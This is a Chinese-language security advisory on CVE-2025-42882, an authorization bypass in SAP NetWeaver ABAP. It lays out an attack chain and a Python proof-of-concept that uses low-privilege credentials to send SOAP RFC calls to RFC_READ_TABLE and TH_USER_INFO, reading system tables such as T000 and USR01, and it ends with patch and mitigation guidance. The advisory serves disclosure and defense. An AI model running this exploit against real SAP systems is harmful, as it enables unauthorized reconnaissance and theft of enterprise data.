CVE-2025-42882: SAP NetWeaver ABAP授权绕过导致信息泄露

漏洞信息

漏洞编号

CVE-2025-42882

漏洞类型

访问控制/授权绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SAP NetWeaver Application Server for ABAP

漏洞概述

CVE-2025-42882是SAP NetWeaver Application Server for ABAP中存在的一个授权绕过漏洞。该漏洞源于系统缺少对特定功能模块的授权检查，允许经过身份验证但仅具有基本权限的攻击者执行特定函数模块，从而检索系统中的受限技术信息。攻击者通过调用此类函数模块可获取服务器环境配置、系统架构、数据库结构等敏感技术细节。这些泄露的环境信息可能帮助攻击者更准确地了解目标系统架构，为后续更复杂的攻击（如权限提升、远程代码执行等）提供关键情报支持。根据CVSS 3.1评分标准，该漏洞对机密性有低影响，对完整性和可用性无影响，整体严重程度评定为中等。

技术细节

该漏洞属于SAP NetWeaver ABAP平台的身份验证后授权缺陷。在ABAP环境中，系统通过角色和授权对象控制用户对功能模块的访问权限。然而，受影响的功能模块缺少必要的授权检查逻辑，允许任何经过基本身份验证的用户调用。攻击者利用此漏洞可执行RFC_READ_TABLE等标准函数模块，直接查询系统内部表（如USR01、T000等），获取用户会话信息、客户端配置、系统参数等敏感数据。此外，攻击者还可调用TH_*系列函数获取当前连接信息、用户列表、服务器状态等运行时环境数据。由于ABAP系统通常承载企业核心业务数据，此类信息泄露可能为横向移动和数据窃取奠定基础。攻击者首先需要拥有有效的SAP用户账户（即使是低权限角色），然后通过RFC/SOAP等接口协议调用目标函数模块即可触发漏洞，无需特殊网络位置或用户交互。

攻击链分析

STEP 1

步骤1

获取有效的SAP用户账户：攻击者通过社会工程、凭证填充或内部人员获取一个具有基本权限的SAP用户账户（即使是低权限角色也足以利用此漏洞）

STEP 2

步骤2

建立RFC/SOAP连接：使用获取的凭证通过SAP的RFC（Remote Function Call）或SOAP接口连接到目标NetWeaver ABAP系统

STEP 3

步骤3

识别目标函数模块：攻击者识别并选择目标函数模块（如RFC_READ_TABLE、TH_USER_INFO等），这些模块缺乏授权检查但可返回敏感系统信息

STEP 4

步骤4

执行未授权查询：攻击者调用目标函数模块，传入特定参数（如查询表名T000、USR01等系统表）

STEP 5

步骤5

收集技术情报：系统返回客户端配置、用户信息、服务器参数、数据库结构等敏感技术信息，攻击者收集并整理这些数据

STEP 6

步骤6

规划后续攻击：利用泄露的环境信息，攻击者分析系统架构、识别潜在弱点、制定更高级攻击策略（如权限提升、代码注入或数据窃取）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-42882 PoC - SAP NetWeaver ABAP Unauthorized Information Disclosure
# Target: SAP NetWeaver Application Server for ABAP
# Requirement: Valid basic user credentials

import requests
import xml.etree.ElementTree as ET

TARGET_URL = "https://sap-server:8000/sap/bc/soap/rfc"
USERNAME = "attacker_user"
PASSWORD = "password123"
CLIENT = "001"

def create_soap_envelope(function_name, params):
    """Generate SOAP envelope for RFC call"""
    return f'''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                xmlns:sap="http://sap.com/soap/SOAP/">
    <soap:Header/>
    <soap:Body>
        <ns1:{function_name} xmlns:ns1="urn:sap-com:document:sap:rfc:functions">
            {params}
        </ns1:{function_name}>
    </soap:Body>
</soap:Envelope>'''

def exploit_information_disclosure():
    """Exploit CVE-2025-42882 to retrieve system information"""
    headers = {
        'Content-Type': 'text/xml; charset=utf-8',
        'SOAPAction': '""/'
    }
    
    # Exploit 1: Read system client table
    params_t000 = '''
            <QUERY_TABLE>T000</QUERY_TABLE>
            <DELIMITER>|</DELIMITER>
            <FIELDS>
                <item>
                    <FIELDNAME>MANDT</FIELDNAME>
                </item>
                <item>
                    <FIELDNAME>MTEXT</FIELDNAME>
                </item>
            </FIELDS>
    '''
    
    # Exploit 2: Get current user session info via TH_USER_INFO
    params_user_info = '''
            <USER>{}</USER>
    '''.format(USERNAME)
    
    # Exploit 3: Get system environment via RFC_SYSTEM_INFO
    
    print("[*] Testing CVE-2025-42882 - SAP ABAP Authorization Bypass")
    print("[*] Target:", TARGET_URL)
    
    # Send exploit requests
    for exploit_name, func_name, params in [
        ('Client Configuration', 'RFC_READ_TABLE', params_t000),
        ('User Session Info', 'TH_USER_INFO', params_user_info)
    ]:
        soap_body = create_soap_envelope(func_name, params)
        try:
            response = requests.post(
                TARGET_URL,
                data=soap_body,
                headers=headers,
                auth=(f'{CLIENT}{USERNAME}', PASSWORD),
                verify=False,
                timeout=30
            )
            if response.status_code == 200:
                print(f"[+] {exploit_name} - Request successful")
                print(f"    Response length: {len(response.text)} bytes")
                # Parse and extract sensitive data
                root = ET.fromstring(response.text)
                # Extract DATA element content
                data = root.find('.//{urn:sap-com:document:sap:rfc:functions}DATA')
                if data is not None:
                    print(f"    [!] Sensitive data leaked: {data.text[:200]}...")
            else:
                print(f"[-] {exploit_name} - Failed (HTTP {response.status_code})")
        except Exception as e:
            print(f"[-] {exploit_name} - Error: {str(e)}")

if __name__ == "__main__":
    exploit_information_disclosure()

影响范围

SAP NetWeaver Application Server for ABAP (所有未安装安全补丁的版本)

SAP NetWeaver 7.4 及更高版本可能受影响

具体版本请参阅SAP官方安全公告 SAP Note 3643337

防御指南

临时缓解措施

立即应用SAP官方安全补丁（SAP Note 3643337）。在补丁发布前，可通过配置S_RFC和S_RFCACL授权对象限制对敏感函数模块的访问；启用系统审计日志监控异常函数调用；实施网络层访问控制，限制对SAP RFC/SOAP端口的直接访问；建议对所有ABAP函数模块进行授权检查审计，确保关键模块不存在授权绕过漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-42882
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-42882
3 Details https://www.cvedetails.com/cve/CVE-2025-42882/
4 VulDB https://vuldb.com/cve/CVE-2025-42882
5 Link https://me.sap.com/notes/3643337
6 Link https://url.sap/sapsecuritypatchday